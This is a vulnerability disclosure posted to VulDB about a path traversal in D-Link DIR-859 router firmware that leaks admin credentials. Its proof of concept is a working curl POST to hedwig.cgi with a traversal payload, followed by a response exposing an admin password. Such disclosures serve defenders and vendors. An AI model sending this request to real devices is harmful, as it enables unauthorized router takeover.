Submit #267965: D-LINK DIR-859 RevA_FW_Patch_v1.06B01 Improper Input Validation, Improper Privilege Managementinfo

TitleD-LINK DIR-859 RevA_FW_Patch_v1.06B01 Improper Input Validation, Improper Privilege Management
DescriptionThank you VULDB TEAM for your incredible work. I want to inform you that after patiently waiting for 30 days in the hope of receiving a response from D-LINK regarding the critical vulnerability identified in the DIR-859 router firmware, regrettably, no outcome has been achieved. Digital security is a shared responsibility, and acting promptly when potential threats are identified is crucial. In light of D-LINK's lack of a satisfactory response, we believe it is in the community's interest to disclose information about the vulnerability to ensure that everyone is aware of the associated risks. # D-Link DIR-859 Firmware RevA_FW_Patch_v1.06B01, a Path Traversal vulnerability was discovered in the "fatlady.php" file. This vulnerability allows for the leakage of session data, leading to Full Privilege Escalation and potential unauthorized control of the device via the admin panel. ## 1. Vulnerability Information **Authors**: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior. **Affiliation**: Aeronautics Institute of Technology (ita.br) **Common Weakness Enumeration**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory CWE-269: Improper Privilege Management **Vulnerability Description**: D-Link DIR-859 Firmware RevA_FW_Patch_v1.06B01, a Path Traversal vulnerability was discovered in the "fatlady.php" file. This vulnerability allows for the leakage of session data, leading to Full Privilege Escalation and potential unauthorized control of the device via the admin panel. **The detail of vulnerability**: In the D-Link DIR-859 firmware version RevA_FW_Patch_v1.06B01, a critical Path Traversal vulnerability has been identified in the "fatlady.php" file. This vulnerability exposes a significant security risk by allowing the leakage of session data, leading to the potential escalation of privileges and unauthorized control of the device via the admin panel. The exploit method involves the use of a malicious POST request sent via Curl, targeting the "fatlady.php" file. Within this request, the attacker manipulates the XML payload, specifically the service parameter, to traverse directories and potentially access unauthorized data. The risk is exacerbated by the lack of proper validation and sanitization of user input within the "fatlady.php" file. The vulnerability allows an attacker to inject commands via the ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml that contains login and password of admin panel. This security flaw is particularly severe due to its exploitation of authenticated users' input trust and the insufficient sanitization of data subsequently used in an operating system context. Immediate action is strongly advised to update the router firmware, implement robust access controls, conduct thorough security audits, and monitor network activity to promptly address and mitigate potential risks. **Vendor of the product**: D-LINK **Affected product**: DIR-859 **Affected Version**: Firmware RevA_FW_Patch_v1.06B01 **Vulnerability Score V3.1**: **Dates info**: Vulnerability discover: 15/12/2023 First try contact with vendor: 15/12/2023 via e-mail Request CVE ID (VULDB): 15/01/2024 Date Record Created (MITRE): First vendor response: CVE Assignment Team response: Second try contact with vendor: CVE published in the CVE List: ## 2. Proof of Concept **Exploit Title**: D-Link DIR-859 Firmware RevA_FW_Patch_v1.06B01, a Path Traversal vulnerability was discovered in the "fatlady.php" file. This vulnerability allows for the leakage of session data, leading to Full Privilege Escalation and potential unauthorized control of the device via the admin panel. **Google Dork**: NA **Date**: 15/01/2024 **Exploit Author**: Françoa Taffarel **Vendor Homepage**: https://www.dlink.com.br/produto/dir-859/#suporte **Software Link:** https://www.dlink.com.br/wp-content/uploads/2018/11/DIR-859_RevA_FW_Patch_v1.06B01.zip **Version:** Firmware RevA_FW_Patch_v1.06B01 **Tested on:** D-Link DIR-859 **CVE:** D-Link DIR-859 Firmware RevA_FW_Patch_v1.06B01, a Path Traversal vulnerability was discovered in the "fatlady.php" file. This vulnerability allows for the leakage of session data, leading to Full Privilege Escalation and potential unauthorized control of the device via the admin panel. ### Malicious POST Request via Curl curl -X POST "http://192.168.0.1:80/hedwig.cgi" -H "Content-Type: text/xml" -H "Cookie: uid=123" -d "<?xml version=\"1.0\" encoding=\"utf-8\"?><postxml><module><service>../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml</service></module></postxml>" ### Legitm RESPONSE LEAKING LOGIN AND PASSWORD FROM ROUTER ADMIN PANEL ``` * Trying 192.168.0.1... * TCP_NODELAY set * Connected to 192.168.0.1 (192.168.0.1) port 80 (#0) > POST /hedwig.cgi HTTP/1.1 > Host: 192.168.0.1 > User-Agent: curl/7.58.0 > Accept: */* > Content-Type: text/xml > Cookie: uid=123 > Content-Length: 145 > * upload completely sent off: 145 out of 145 bytes < HTTP/1.1 200 OK < Server: WebServer < Date: Wed, 23 Nov 2016 16:25:55 GMT < Transfer-Encoding: chunked < Content-Type: text/xml < <module> <service></service> <dhcps6> <seqno>3</seqno> <max>2</max> <entry> <uid>DHCPS6-1</uid> <mode>STATELESS</mode> <start>::3</start> <count>20</count> <pd> <enable>1</enable> <mode>1</mode> </pd> </entry> <entry> <uid>DHCPS6-2</uid> <mode>STATELESS</mode> <start>::3</start> <count>20</count> <pd> <enable>0</enable> <mode>1</mode> </pd> </entry> <entry> <uid>DHCPS6-3</uid> <mode>STATELESS</mode> <start>::3</start> <count>20</count> <pd> <enable>0</enable> <mode>1</mode> </pd> </entry> </dhcps6> <inf> <device> <layout>router</layout> <wirelessmode>WirelessRouter</wirelessmode> <hostname>dlinkrouter</hostname> <hostname_dhcpc>dlinkrouter</hostname_dhcpc> <devicename>DIR-859</devicename> <gw_name>DIR-859</gw_name> <router> <mode>1W2L</mode> <wanindex>4</wanindex> </router> <time> <ntp> <enable>1</enable> <period>604800</period> <server>ntp1.dlink.com</server> </ntp> <ntp6> <enable>1</enable> <period>604800</period> </ntp6> <timezone>61</timezone> <time></time> <date></date> <dst>0</dst> <dstmanual></dstmanual> <dstoffset></dstoffset> </time> <account> <count>1</count> <max>2</max> <entry> <name>Admin</name> <password>123456aa</password> <group>0</group> </entry> </account> <log> <level>NOTICE</level> <mydlink> <dnsquery>1</dnsquery> </mydlink> </log> <passthrough> <ipv6>0</ipv6> <pppoe>1</pppoe> <ipsec>1</ipsec> <pptp>1</pptp> <rtsp>1</rtsp> <sip>1</sip> </passthrough> <multicast> <igmpproxy>0</igmpproxy> <wifienhance>0</wifienhance> <mldproxy>0</mldproxy> <wifienhance6>0</wifienhance6> </multicast> <session> <captcha>0</captcha> <dummy></dummy> <timeout>300</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> ```
Source⚠️ https://github.com/c2dc/cve-reported/blob/main/CVE-2024-XXXX/CVE-2024-XXXX.md
Userfrancoa.taffarel (ID 58833)
Submission01/15/2024 13:32 (4 months ago)
Moderation01/20/2024 16:13 (5 days later)
StatusAccepted
VulDB Entry251666

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!